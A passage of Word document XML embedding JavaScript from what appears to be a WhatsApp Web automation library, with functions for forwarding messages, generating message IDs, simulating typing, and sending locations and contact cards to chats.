        <w:t xml:space="preserve">        id: newId,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        local: !0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        self: "out",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        t: parseInt(new Date().getTime() / 1000),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        to: new Store.WidFactory.createWid(chatId),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        from: Store.Me.wid,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        isNewMsg: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Object.assign(tempMsg, extend);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const res = await Promise.all(Store.addAndSendMsgToChat(chat, extend))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return res[1] ==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Forward an array of messages to a specific chat using the message ids or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to '000000000000@c.us'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param {string|array[Message | string]} messages this can be any mixture of message ids or message objects</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param {boolean} skipMyMessages This indicates whether or not to skip your own messages from the array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window.WAPI.forwardMessages = async function (to, messages, skipMyMessages) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!Array.isArray(messages)) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        messages =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finalForwardMessages = messages.map(msg =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (typeof msg == 'string') {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            //msg is string, get the message object</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            return window.Store.Msg.get(msg);</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return window.Store.Msg.get(msg.id);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}).filter(msg =&gt; skipMyMessages ? !msg.__x_isSentByMe :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 let userId = new window.Store.UserConstructor(to);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let conversation = window.Store.Chat.get(to);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return await conversation.forwardMessages(finalForwardMessages)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Create an chat ID based in a cloned one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chatId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window.WAPI.getNewMessageId = function (chatId) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var newMsgId = new Store.MsgKey(Object.assign({}, Store.Msg.models[0].__x_id))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    // .clone();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newMsgId.fromMe = true;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    newMsgId.id = WAPI.getNewId().toUpperCase();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    newMsgId.remote = new Store.WidFactory.createWid(chatId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    newMsgId._serialized = `${newMsgId.fromMe}_${newMsgId.remote}_${newMsgId.id}`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return newMsgId;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Simulate '...typing' in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chatId '000000000000@c.us'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param {boolean} on true to turn on similated typing, false to turn it off //you need to manually turn this off.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window.WAPI.simulateTyping = async function (chatId, on) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (on) Store.ChatStates.sendChatStateComposing(chatId)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    else Store.ChatStates.sendChatStatePaused(chatId)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 location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chatId '000000000000@c.us'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param {string} lat latitude</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param {string} lng longitude</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param {string} loc Text to go with the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window.WAPI.sendLocation = async function (chatId, lat, lng, loc) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    loc = loc || '';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var chat = Store.Chat.get(chatId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!chat) return false;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var tempMsg = Object.create(Store.Msg.models.filter(msg =&gt; msg.__x_isSentByMe &amp;&amp; !msg.quotedMsg)[0]);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var newId = window.WAPI.getNewMessageId(chatId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var extend = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        ack: 0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        id: newId,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        local: !0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        self: "out",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        t: parseInt(new Date().getTime() / 1000),</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isNewMsg: !0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        type: "location",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        lat,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        lng,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        loc,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        clientUrl: undefined,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        directPath: undefined,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        filehash: undefined,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        uploadhash: undefined,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        mediaKey: undefined,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        isQuotedMsgAvailable: false,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        invis: false,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        mediaKeyTimestamp: undefined,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        mimetype: undefined,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        height: undefined,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        width: undefined,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        ephemeralStartTimestamp: undefined,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        body: undefined,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        mediaData: undefined,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        isQuotedMsgAvailable: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Object.assign(tempMsg, extend);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return (await Promise.all(Store.addAndSendMsgToChat(chat, tempMsg)))[1] === 'success' ? newId._serialized :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 VCARD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chatId '000000000000@c.us'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param {string} vcard vcard as a string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param {string} contactName The display name for the contact. CANNOT BE NULL OTHERWISE IT WILL SEND SOME RANDOM CONTACT FROM YOUR ADDRESS BOOK.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param {string} contactNumber If supplied, this will be injected into the vcard (VERSION 3 ONLY FROM VCARDJS) with the WA id to make it show up with the correct buttons on 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window.WAPI.sendVCard = async function (chatId, vcard, contactName, contactNumber) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var chat = Store.Chat.get(chatId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var tempMsg = Object.create(Store.Msg.models.filter(msg =&gt; msg.__x_isSentByMe &amp;&amp; !msg.quotedMsg)[0]);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var newId = window.WAPI.getNewMessageId(chatId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var extend = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        ack: 0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        id: newId,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        local: !0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        self: "out",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        t: parseInt(new Date().getTime() / 1000),</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isNewMsg: !0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        type: "vcard",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        clientUrl: undefined,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        directPath: undefined,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        filehash: undefined,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        uploadhash: undefined,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        mediaKey: undefined,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        isQuotedMsgAvailable: false,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        invis: false,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        mediaKeyTimestamp: undefined,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        mimetype: undefined,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        height: undefined,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        width: undefined,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        ephemeralStartTimestamp: undefined,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
